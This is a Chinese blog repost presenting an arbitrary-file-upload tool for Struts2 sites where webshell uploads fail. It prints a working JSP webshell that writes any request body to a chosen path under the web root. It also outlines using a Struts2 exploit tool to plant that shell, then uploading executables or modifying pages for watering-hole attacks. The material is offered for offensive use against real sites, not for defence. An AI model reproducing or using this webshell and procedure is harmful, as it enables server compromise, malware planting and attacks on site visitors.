zoukankan      html  css  js  c++  java
  • [原创]Struts2奇葩环境任意文件上传工具

    [原创]Struts2奇葩环境任意文件上传工具(解决菜刀无法传文件或上传乱码等问题)

     上面这问题问得好 
    1 不知道大家有没碰到有些Strus2站点  上传JSP后访问404 或者503
        注意我说的是404或503不是403(要是403换个css/img等目录或许可以)
        但对于明明在web目录下放了jsp访问却404,怎么办?上exe 弄它啊 怎么办
    2 估计大部分人碰到的是可以上传小马无法上传大马 怎么办?
    3 碰到可上传菜刀马,但无法通过菜刀上传任何文件怎么办?
    4 比如通过菜刀传别的马进去JSP代码被截断了怎么办?
    5 或者说目标站点页面是XX语言,实施水坑,修改代码保存乱码 怎么办?

    第一份 byte
    <%@page import="java.io.*"%><%if(request.getParameter("f")!=null){FileOutputStream os=new FileOutputStream(application.getRealPath("/")+request.getParameter("f"));InputStream is=request.getInputStream();byte[] b=new byte[512];int n;while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();}%>
    0x001 对应连接工具为13年作品 (工具大家自己找)

    第二份 Hex因年前碰到一个环境 13年的竟然不兼容 因工作需要又弄了一份
    第一步 使用k8最新s2工具 通过漏洞上传小马2
     
    0x002 连接小马 填写对应URL,填写输出文件名 点击任意文件上传即可

     0x003 随便找的一个URL测试(应用用win系统才对),不过上传EXE 再下载回本地(测试能用没损坏也是一样)

  • 相关阅读:
    Mandriva Flash: 到处可用的口袋 Linux
    Pidgin 衔接 Google Talk 的设置配备铺排
    5 个使 Vim 更易用的脚本
    Bash 运用才干大补贴
    915Resolution打点宽屏表现标题问题
    Linux下误删root目次
    惠普推出 Linux 迷你条记本
    weblogic8.1for linux ES3.0拆卸与设置
    英俊的 Linux Mini PC
    Zonbu-售价 99 美元的袖珍电脑
  • 原文地址:https://www.cnblogs.com/k8gege/p/10261217.html
Copyright © 2011-2022 走看看